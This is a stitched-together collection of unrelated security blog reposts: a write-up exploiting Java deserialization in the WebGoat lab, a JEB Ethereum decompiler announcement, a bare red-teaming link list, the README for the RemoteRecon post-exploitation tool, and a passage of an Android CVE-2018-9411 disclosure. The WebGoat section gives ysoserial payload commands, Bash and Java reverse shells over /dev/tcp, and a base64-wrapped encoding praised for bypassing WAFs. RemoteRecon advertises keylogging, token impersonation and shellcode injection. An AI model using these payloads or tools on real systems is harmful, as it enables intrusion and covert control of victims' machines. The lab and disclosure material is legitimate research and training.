Java Deserialization — From Discovery to Reverse Shell on Limited Environments

(Original text by Ahmed Sherif & Francesco Soncina)

In this article, we are going to show you our journey of exploiting an insecure deserialization vulnerability, taking the WebGoat 8 deserialization challenge (deployed on Docker) as an example. The challenge can be solved just by making the target execute a sleep command for 5 seconds. However, we are going to move further for fun and try to get a reverse shell.


The Java deserialization issue has been known in the security community for a few years. In 2015, two security researchers, Chris Frohoff and Gabriel Lawrence, gave a talk, Marshalling Pickles, at AppSecCali. Additionally, they released their payload generator tool, called ysoserial.

Object serialization allows developers to convert in-memory objects to binary or textual data formats for storage or transfer. However, deserializing objects from untrusted data can allow an attacker to achieve remote code execution.


As mentioned in the challenge, the vulnerable page takes a serialized Java object in Base64 format from user input and blindly deserializes it. We will exploit this vulnerability by providing a serialized object that triggers a Property Oriented Programming chain (POP chain) to achieve remote command execution during deserialization.
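To illustrate why blind deserialization is dangerous, here is a minimal, self-contained Java sketch (a toy gadget we made up for illustration, not the actual Hibernate chain used later): any readObject() method on the classpath runs during deserialization, before the application ever sees the resulting object.

```java
import java.io.*;

// Toy example: a Serializable class whose readObject() has a side effect.
// A real gadget chain strings together classes already on the classpath
// until it reaches something like Runtime.exec().
public class DeserDemo {
    static class Gadget implements Serializable {
        static volatile boolean fired = false;
        String cmd;
        Gadget(String cmd) { this.cmd = cmd; }
        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            fired = true;  // code runs here, during deserialization
            System.out.println("side effect during deserialization: " + cmd);
        }
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new Gadget("sleep 5"));
        }
        // The "victim" only calls readObject(); the side effect fires anyway.
        try (ObjectInputStream ois = new ObjectInputStream(
                new ByteArrayInputStream(bos.toByteArray()))) {
            ois.readObject();
        }
    }
}
```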

The WebGoat 8 Insecure Deserialization challenge

We fired up Burp and installed a plugin called Java Deserialization Scanner. The plugin consists of two features: one for scanning and the other for generating exploits based on the ysoserial tool.

Java Deserialization Scanner Plugin for Burp Suite

After scanning the remote endpoint, the Burp plugin reports:

Hibernate 5 (Sleep): Potentially VULNERABLE!!!

Sounds great!


Let’s move to the next step and go to the exploitation tab to achieve arbitrary command execution.

Huh?! It seems there is an issue with ysoserial. Let’s dig deeper and check the console to see what the issue is exactly.

Error in payload generation

By looking at ysoserial, we see that two different POP chains are available for Hibernate. By trying those payloads, we figured out that neither of them gets executed on the target system.

Available payloads in ysoserial

How did the plugin generate the payload that triggered the sleep command, then?

We decided to look at the source code of the plugin.

We noticed that the payload is hard-coded in the plugin’s source code, so we need to find a way to generate the same payload in order to get it working.

The payload is hard-coded.

Based on some research and help, we figured out that we needed to modify the current version of ysoserial to get our payloads working.

We downloaded the source code of ysoserial and decided to recompile it using Hibernate 5. In order to successfully build ysoserial with Hibernate 5 we need to add the javax.el package to the pom.xml file.
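For reference, the dependency can be declared in pom.xml roughly as follows (a sketch: the exact artifact coordinates and version used in the pull request may differ):

```xml
<!-- assumed coordinates for the javax.el API; verify against the PR -->
<dependency>
  <groupId>javax.el</groupId>
  <artifactId>javax.el-api</artifactId>
  <version>3.0.0</version>
</dependency>
```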

We also sent a pull request to the original project to fix the build when the hibernate5 profile is selected.

Updated pom.xml

We can proceed to rebuild ysoserial with the following command:

mvn clean package -DskipTests -Dhibernate5

and then we can generate the payload with:

java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0
Working payload for Hibernate 5

We can verify that our command was executed by accessing the Docker container with the following command:

docker exec -it <CONTAINER_ID> /bin/bash

As we can see our payload was successfully executed on the machine!

The exploit works!

We proceed to enumerate the binaries on the target machine.

webgoat@1d142ccc69ec:/$ which php
webgoat@1d142ccc69ec:/$ which python
webgoat@1d142ccc69ec:/$ which python3
webgoat@1d142ccc69ec:/$ which wget
webgoat@1d142ccc69ec:/$ which curl
webgoat@1d142ccc69ec:/$ which nc
webgoat@1d142ccc69ec:/$ which perl
webgoat@1d142ccc69ec:/$ which bash

Only Perl and Bash are available. Let’s try to craft a payload to send us a reverse shell.

We looked at some one-liner reverse shells on Pentest Monkeys:

And decided to try the Bash reverse shell:

bash -i >& /dev/tcp/ 0>&1

However, as you might know, java.lang.Runtime.exec() has some limitations: shell operators such as redirection and piping are not supported.
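To illustrate the point: exec() tokenizes a single command string on whitespace and never invokes a shell, so operators like >& and | are passed to the target program as literal arguments. The usual workaround, sketched below on a harmless stand-in command, is to hand the whole line to a shell explicitly via the String[] form (assuming a Unix-like system with /bin/sh):

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExecDemo {
    // Array form: the shell itself parses pipes/redirections,
    // so shell operators behave as expected.
    static String run(String shellCmd) throws Exception {
        Process p = Runtime.getRuntime().exec(
                new String[]{"/bin/sh", "-c", shellCmd});
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(p.getInputStream()))) {
            String line = r.readLine();
            p.waitFor();
            return line == null ? "" : line.trim();
        }
    }

    public static void main(String[] args) throws Exception {
        // The pipe works because /bin/sh interprets it, not exec().
        System.out.println(run("echo one two | wc -w"));  // prints "2"
    }
}
```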

We decided to move forward with another option: a reverse shell written in Java. We are going to modify the ysoserial source code to generate a reverse shell payload.

The following file is the one we need to modify:

/root/ysoserial/src/main/java/ysoserial/payloads/util/ from line 116 to 118.

The following Java reverse shell is mentioned on Pentest Monkeys, but it still didn’t work:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

After playing around with the code, we ended up with the following:

String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"}).waitFor();";

Let’s rebuild ysoserial again and test the generated payload.

Generating the weaponized payload with a Bash reverse shell

And.. we got a reverse shell back!


Generalizing the payload generation process

During our research, we also found an encoder that does the job for us:

By providing the following Bash reverse shell:

bash -i >& /dev/tcp/[IP address]/[port] 0>&1

the generated payload will be:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}
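The encoding step itself is straightforward and can be reproduced with a few lines of Java (a sketch of what such an encoder does; the helper name is ours):

```java
import java.util.Base64;

public class PayloadEncoder {
    // Wrap a shell command so it survives Runtime.exec(): the outer command
    // contains no spaces or shell metacharacters outside brace expansion,
    // and the real command travels as Base64.
    static String encode(String cmd) {
        String b64 = Base64.getEncoder().encodeToString(cmd.getBytes());
        return "bash -c {echo," + b64 + "}|{base64,-d}|{bash,-i}";
    }

    public static void main(String[] args) {
        System.out.println(encode("bash -i >& /dev/tcp/10.10.10.1/8080 0>&1"));
    }
}
```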

Awesome! This encoder can also be useful for bypassing WAFs! 🚀

Special thanks to Federico Dotta and Mahmoud ElMorabea!




We’re very excited to announce that the pre-release of our Ethereum smart contract decompiler is available. We hope that it will become a tool of choice for security auditors, vulnerability researchers, and reverse engineers examining opaque smart contracts running on Ethereum platforms.

TL;DR: Download the demo build and start reversing contracts

Keep on reading to learn about the current features of the decompiler; how to use it and understand its output; its current limitations, and planned additions.

This opaque multisig wallet is holding more than USD $22 million as of 10/26/2018 (on mainnet, address 0x3DBB3E8A5B1E9DF522A441FFB8464F57798714B1)

Overall decompiler features

The decompiler modules provide the following specific capabilities:

  • The decompiler takes compiled smart contract EVM 1 code as input, and decompiles it to Solidity-like source code.
  • The initial EVM code analysis passes determine the contract’s public and private methods, including implementations of public methods synthetically generated by compilers.
  • Code analysis attempts to determine method and event names and prototypes, without access to an ABI.
  • The decompiler also attempts to recover various high-level constructs, including:
    • Implementations of well-known interfaces, such as ERC20 for standard tokens, ERC721 for non-fungible tokens, MultiSigWallet contracts, etc.
    • Storage variables and types
    • High-level Solidity artifacts and idioms, including:
      • Function mutability attributes
      • Function payability state
      • Event emission, including event name
      • Invocations of address.send() or address.transfer()
      • Precompiled contract invocations

On top of the above, the JEB back-end and client platform provide the following standard functionality:

  • The decompiler uses JEB’s optimizations pipeline to produce high-level clean code.
  • It uses JEB code analysis core features, and therefore permits: code refactoring (eg, consistently renaming methods or fields), commenting and annotating, navigating (eg, cross references), typing, graphing, etc.
  • Users have access to the intermediate-level IR representation as well as high-level AST representations through the JEB API.
  • More generally, the API allows power-users to write extensions, ranging from simple scripts in Python to complex plugins in Java.

Our Ethereum modules were tested on thousands of smart contracts active on Ethereum mainnet and testnets.

Basic usage

Open a contract via the “File, Open smart contract…” menu entry.

You will be offered two options:

  • Open a binary file already stored on disk
  • Download 2 and open a contract from one of the principal Ethereum networks: mainnet, rinkeby, ropsten, or kovan:
    • Select the network
    • Provide the contract 20-byte address
    • Click Download and select a file destination
Open a contract via the File, Open smart contract menu entry

Note that to be recognized as EVM code, a file must:

  • either have a “.evm-bytecode” extension: in this case, the file may contain binary or hex-encoded code;
  • or have a “.runtime” or “.bin-runtime” extension (as generated by the solc Solidity compiler), and contain hex-encoded Solidity-generated code.

If you are opening raw files, we recommend you append the “.evm-bytecode” extension to them in order to guarantee that they will be processed as EVM contract code.

Contract Processing

JEB will process your contract file and generate a DecompiledContract class item to represent it:

The Assembly view on the right panel shows the processed code.

To switch to the decompiled view, select the “Decompiled Contract” node in the Hierarchy view, and press TAB (or right-click, Decompile).

Right-click on items to bring up context menus showing the principal commands and shortcuts.
The decompiled view of a contract.

The decompiled contract is rendered in Solidity-like code: it is mostly Solidity code, but not entirely; constructs that are illegal in Solidity are used throughout the code to represent instructions that the decompiler could not represent otherwise. Examples include: low-level statements representing some low-level EVM instructions, memory accesses, or very rarely, goto statements. Do not expect a DecompiledContract to be easily recompiled.

Code views

You may adjust the View panels to have side-by-side views if you wish to navigate the assembly and high-level code at the same time.

  • In the assembly view, within a routine, press Space to visualize its control flow graph.
  • To navigate from assembly to source, and back, press the TAB key. The caret will be positioned on the closest matching instruction.
Side by side views: assembly and source

Contract information

In the Project Explorer panel, double click the contract node (the node with the official Ethereum Foundation logo), and then select the Description tab in the opened view to see interesting information about the processed contract, such as:

  • The detected compiler and/or its version (currently supported are variants of Solidity and Vyper compilers).
  • The list of detected routines (private and public, with their hashes).
  • The Swarm hash of the metadata file, if any.
The contract was identified as being compiled with Solidity <= 0.4.21


The usual commands can be used to refactor and annotate the assembly or decompiled code. You will find the exhaustive list in the Action and Native menus. Here are basic commands:

  • Rename items (methods, variables, globals, …) using the N key
  • Navigate the code by examining cross-references, using the X key (eg, find all callers of a method and jump to one of them)
  • Comment using the Slash key
  • As said earlier, the TAB key is useful to navigate back and forth from the low-level EVM code to high-level decompiled code

We recommend you browse the general user manual to get up to speed on how to use JEB.

Rename an item (eg, a variable) by pressing the N key

Remember that you can change immediate number bases and rendering by using the B key. In the example below, you can see a couple of strings present in the bad Fomo3D contract, initially rendered in Hex:

All immediates are rendered as hex-strings by default.
Use the B key to cycle through base (10, 16, etc.) and rendering (number, ascii)

Understanding decompiled contracts

This section highlights idioms you will encounter throughout decompiled pseudo-Solidity code. The examples below show the JEB UI client with assembly on the left side and high-level decompiled code on the right side. The contracts used as examples are live contracts currently active on Ethereum mainnet.

We also highlight current limitations and planned additions.

Dispatcher and public functions

The entry-point function of a contract, at address 0, is generally its dispatcher. It is named start() by JEB, and in most cases consists of an if-statement comparing the input calldata hash (the first 4 bytes) to pre-calculated hashes, to determine which routine is to be executed.

  • JEB attempts to determine public method names by using a hash dictionary (currently containing more than 140,000 entries).
  • Contracts compiled by Solidity generally use synthetic (compiler-generated) methods as bridges between public routines, which use the public Ethereum ABI, and internal routines, which use a compiler-specific ABI. Those routines are identified as well and, if their corresponding public method was named, will be assigned a similar name, __impl_{PUBLIC_NAME}.
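The dispatching described above can be sketched in Java (illustrative only; in a real contract the selector is the first 4 bytes of keccak256 of the method signature, and the two selectors below are the well-known ones for ERC20's transfer and balanceOf):

```java
public class DispatcherDemo {
    // 4-byte selectors: keccak256(signature)[0..3].
    static final int SEL_TRANSFER   = 0xa9059cbb;  // transfer(address,uint256)
    static final int SEL_BALANCE_OF = 0x70a08231;  // balanceOf(address)

    // Mimics start(): read the first 4 calldata bytes and branch on them.
    static String dispatch(byte[] calldata) {
        if (calldata.length < 4) return "fallback()";
        int sel = ((calldata[0] & 0xff) << 24) | ((calldata[1] & 0xff) << 16)
                | ((calldata[2] & 0xff) << 8) | (calldata[3] & 0xff);
        switch (sel) {
            case SEL_TRANSFER:   return "__impl_transfer";
            case SEL_BALANCE_OF: return "__impl_balanceOf";
            default:             return "fallback()";
        }
    }

    public static void main(String[] args) {
        byte[] call = {(byte) 0xa9, 0x05, (byte) 0x9c, (byte) 0xbb};
        System.out.println(dispatch(call));  // prints "__impl_transfer"
    }
}
```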

NOTE/PLANNED ADDITION: currently, JEB does not attempt to process input data of public routines and massage it back into an explicit prototype with regular variables. Therefore, you will see low-level access to CALLDATA bytes within public methods.

A dispatcher.

Below, see the public method collectToken(), which is retrieving its first parameter – a 20 byte address – from the calldata.

A public method reading its arguments from CALLDATA bytes.

Interface discovery

At the time of writing, implementation of the following interfaces can be detected: ERC20, ERC165, ERC721, ERC721TokenReceiver, ERC721Metadata, ERC721Enumerable, ERC820, ERC223, ERC777, TokenFallback used by ERC223/ERC777 interfaces, as well as the common MultiSigWallet interface.

Eg, the contract below was identified as an ERC20 token implementation:

This contract implements all methods specified by the ERC20 interface.

Function attributes

JEB does its best to retrieve:

  • low-level state mutability attributes (pure, read-only, read-write)
  • the high-level Solidity ‘payable’ attribute, reserved for public methods

Explicitly non-payable functions have lower-level synthetic stubs that verify that no Ether is being received, and REVERT if that is the case. If JEB decides to remove this stub, the function will always have an inline comment /* non payable */ to avoid any ambiguity.

The contract below shows two public methods, one has a default mutability state (non-payable); the other one is payable. (Note that the hash 0xFF03AD56 was not resolved, therefore the name of the method is unknown and was set to sub_AF; you may also see a call to the collect()’s bridge function __impl_collect(), as was mentioned in the previous section).

Two public methods, one is payable, the other is not and will revert if it receives Ether.

Storage variables

The pre-release decompiler ships with a limited storage reconstructor module.

  • Accesses to primitives (int8 to int256, uint8 to uint256) is reconstructed in most cases
  • Packed small primitives in storage words are extracted (eg, a 256-bit storage word containing 2x uint8 and 1x int32, and accessed as such throughout the code, will yield 3 contract variables, as one would expect to see in a Solidity contract)
Four primitive storage variables were reconstructed.
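The extraction of packed primitives can be sketched as follows (illustrative Java; the layout models Solidity's packing from the low-order bytes of the storage word upward):

```java
import java.math.BigInteger;

public class StoragePackingDemo {
    // A 256-bit storage word holding, from the low bits upward:
    // uint8 a | uint8 b | int32 c   (remaining high bits unused)
    static int[] unpack(BigInteger word) {
        int a = word.and(BigInteger.valueOf(0xff)).intValue();
        int b = word.shiftRight(8).and(BigInteger.valueOf(0xff)).intValue();
        int c = word.shiftRight(16)
                    .and(BigInteger.valueOf(0xFFFFFFFFL)).intValue();
        return new int[]{a, b, c};
    }

    public static void main(String[] args) {
        // Build a word with a=0x01, b=0x02, c=0xdeadbeef packed together.
        BigInteger word = BigInteger.valueOf(0xdeadbeefL).shiftLeft(16)
                .or(BigInteger.valueOf(0x0201));
        int[] vars = unpack(word);
        System.out.printf("a=0x%x b=0x%x c=0x%x%n", vars[0], vars[1], vars[2]);
    }
}
```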

However, currently, accesses to complex storage variables, such as mappings, mappings of mappings, mappings of structures, etc. are not simplified. This limitation will be addressed in the full release.

When a storage variable is not resolved, you will see simple “storage[…]” assignments, such as:

Unresolved storage assignment, here, to a mapping.

Due to how storage on Ethereum is designed (a key-value store of uint256 to uint256), Solidity internally uses two or more levels of indirection for computing actual storage keys. Those low-level storage keys depend on the position of the high-level storage variables. The KECCAK256 opcode is used to calculate intermediate and final keys. We will describe this mechanism in detail in a future blog post.

Precompiled contracts

Ethereum defines four pre-compiled contracts at addresses 1, 2, 3, 4. (Other addresses (5-8) are being reserved for additional pre-compiled contracts, but this is still at the ERC stage.)

JEB identifies CALLs that will eventually lead to pre-compiled code execution, and marks them as such in decompiled code: call_{specific}.

The example below shows the __impl_Receive method (name recovered) of the 34C3 CTF contract, which calls into address #2, a pre-compiled contract providing a fast implementation of SHA-256.

This contract calls address 2 to calculate the SHA-256 of a binary blob.

Ether send()

Solidity’s send can be translated into a lower-level call with a standard gas stipend and zero parameters. It is essentially used to send Ether to a contract through the target contract fallback function.

NOTE: Currently, JEB renders them as send(address, amount) instead of address.send(amount)

The contract below is live on mainnet. It is a simple forwarder, that does not store ether: it forwards the received amount to another contract.

This contract makes use of address.send(…) to send Ether

Ether transfer()

Solidity’s transfer is an even higher-level variant of send that checks and REVERTs with data if the CALL failed. JEB identifies those calls as well.

NOTE: Currently, JEB renders them as transfer(address, amount) instead of address.transfer(amount)

This contract makes use of address.transfer(…) to send Ether

Event emission

JEB attempts to partially reconstruct LOGx (x in 1..4) opcodes back into high-level Solidity “emit Event(…)”. The event name is resolved by reversing the Event method prototype hash. At the time of writing, our dictionary contains more than 20,000 entries.

If JEB cannot reverse a LOGx instruction, or if LOG0 is used, then a lower-level log(…) call will be used.

NOTE: currently, the event parameters are not processed; therefore, the emit construct used in the decompiled code has the following form: emit Event(memory, size[, topic2[, topic3[, topic4]]]). topic1 is always used to store the event prototype hash.

An Invocation of LOG4 reversed to an “emit Deposit(…)” event emission


The JEB API allows automation of complex or repetitive tasks. Back-end plugins or complex scripts can be written in Python or Java. The API updates that ship with JEB 3.0-beta.6 allow users to query decompiled contract code:

  • access to the intermediate representation (IR)
  • access to the final Solidity-like representation (AST)

API use is out-of-scope here. We will provide examples either in a subsequent blog post or on our public GitHub repository.


As said in the introduction, if you are reverse engineering opaque contracts (that is, most contracts on Ethereum’s mainnet), we believe you will find JEB useful.

You may give the pre-release a try by downloading the demo here. Please let us know your feedback: we are planning a full release before the end of the year.

As always, thank you to all our users and supporters. -Nicolas

  1. EVM: Ethereum Virtual Machine 
  2. This Open plugin uses Etherscan to retrieve the contract code 

List of Awesome Red Teaming Resources

Awesome Red Teaming



List of Awesome Red Team / Red Teaming Resources

This list is for anyone wishing to learn about Red Teaming but who does not have a starting point.

Anyway, this is a living resource and will be updated regularly with the latest adversarial tactics and techniques based on MITRE ATT&CK.

You can help by sending Pull Requests to add more information.

Table of Contents

 Initial Access



 Privilege Escalation

User Account Control Bypass


 Defense Evasion

 Credential Access


 Lateral Movement



 Command and Control

Domain Fronting

Connection Proxy

Web Services

Application Layer Protocol


 Embedded and Peripheral Devices Hacking


 RedTeam Gadgets

Network Implants

Wifi Auditing


Software Defined Radio — SDR



 Training ( Free )



Remote Recon and Collection

GitHub link

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host without having to expose your complete toolkit/agent. Oftentimes, as operators, we need to compromise a host just so we can keylog or screenshot (or perform some other minuscule task) against a person/host of interest. Why should you have to push Beacon, Empire, INNUENDO, Meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, and exposes functionality in your agent and, most likely, your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence, then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more. Below is a visual representation of how I imagine an adversary would utilize this.

Remote Recon

RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in an asynchronous, push-and-pull manner: you send commands via the PowerShell controller and then retrieve the results of each command via the registry. All results are displayed in the local console.

Current Capabilities



Token Impersonation

Inject ReflectiveDll (Must Export the ReflectiveLoader function from Stephen Fewer)

Inject Shellcode


Improvements, Additions, ToDo’s:

Dynamically Load and execute .NET assemblies

Support non-reflective DLLs for injection

Build Dependencies

The RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes.

If you wish to make changes to the codebase on your own, there are a few dependencies required.

  1. Visual Studio 2015+
  2. Windows 7 and .NET SDK
  3. Windows 8.1 SDK
  4. mscorlib.tlh (This is included in the project but there are instances where intellisense can’t seem to find it [shrug])
  5. .NET 3.5 & 4
  6. James Forshaw’s DotNetToJScript project
  7. Fody/Costura Nuget package. Package and embed any extra dependencies in .NET.


Thanks to these individuals for their contributions via code or knowledge 🙂






For a short setup guide, please visit the wiki

CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )


As part of our platform research in Zimperium zLabs, I recently disclosed to Google a critical vulnerability affecting multiple high-privileged Android services. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), with additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.


The separation of Project Treble introduces an increase in the overall amount of IPC (inter-process communication): data that was previously passed within the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough, Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate between this new type of IPC and others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied into the new HIDL libraries (although, personally, I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each set of libraries is not exactly the same (you cannot simply substitute one for another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.
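The fd-based sharing mechanism can be illustrated with plain Java (an analogue using a temp file rather than ashmem, which has no direct Java API here): two independent mappings of the same descriptor observe each other's writes, just as two processes mapping the same shared fd would.

```java
import java.io.RandomAccessFile;
import java.nio.MappedByteBuffer;
import java.nio.channels.FileChannel;
import java.nio.file.Files;
import java.nio.file.Path;

public class SharedMapDemo {
    // Map the same descriptor twice and show the mappings are coherent.
    static int demo() throws Exception {
        Path tmp = Files.createTempFile("shm", ".bin");
        try (RandomAccessFile f = new RandomAccessFile(tmp.toFile(), "rw")) {
            FileChannel ch = f.getChannel();
            MappedByteBuffer a = ch.map(FileChannel.MapMode.READ_WRITE, 0, 4096);
            MappedByteBuffer b = ch.map(FileChannel.MapMode.READ_WRITE, 0, 4096);
            a.put(0, (byte) 42);  // "process A" writes through its mapping...
            return b.get(0);      // ..."process B" reads through its own
        } finally {
            Files.delete(tmp);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(demo());  // prints 42
    }
}
```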

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange; why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32-bit process handle this? Let’s check by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!
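The truncation is easy to model (Java sketch; the (int) cast keeps the low 32 bits, just like the implicit size_t conversion in a 32-bit process):

```java
public class TruncationDemo {
    // Model the implicit size_t conversion in a 32-bit process:
    // only the low 32 bits of the 64-bit hidl_memory size survive.
    static long mappedSize(long hidlSize) {
        return (int) hidlSize & 0xFFFFFFFFL;
    }

    public static void main(String[] args) {
        long hidlSize = 0x100001000L;  // size > UINT32_MAX, as the attacker sends it
        System.out.printf("declared 0x%x, actually mapped 0x%x%n",
                hidlSize, mappedSize(hidlSize));
        // Bounds checks against the declared 64-bit size pass for offsets far
        // beyond the 0x1000 bytes that mmap() really mapped.
    }
}
```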

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:
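The idea behind such a check can be sketched in Java (illustrative; the size_t truncation is modeled as an (int) cast): a bounds check performed against the truncated size is safe, while a check against the raw 64-bit size is not.

```java
public class BoundsCheck {
    // Vulnerable pattern: check against the full 64-bit size
    // (and, here, without minding overflow either).
    static boolean vulnerableCheck(long offset, long len, long hidlSize) {
        return offset + len <= hidlSize;
    }

    // Safer pattern: check against the size the 32-bit process actually
    // mapped. The first two comparisons also make the sum overflow-free,
    // since mapped never exceeds 0xFFFFFFFF.
    static boolean safeCheck(long offset, long len, long hidlSize) {
        long mapped = (int) hidlSize & 0xFFFFFFFFL;  // truncated like mmap()
        return offset <= mapped && len <= mapped && offset + len <= mapped;
    }

    public static void main(String[] args) {
        long evil = 0x100001000L;  // only 0x1000 bytes really get mapped
        System.out.println(vulnerableCheck(0x100000, 0x1000, evil)); // true (bad)
        System.out.println(safeCheck(0x100000, 0x1000, evil));       // false
    }
}
```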

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases where such an implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant to multiple vendors, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Directly accessible from an unprivileged app. Otherwise this makes everything a bit hypothetical, as we would be talking about a target which is only accessible if you have already compromised another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.


CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.


First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that “first_param + second_param <= third_param” while minding possible overflows.

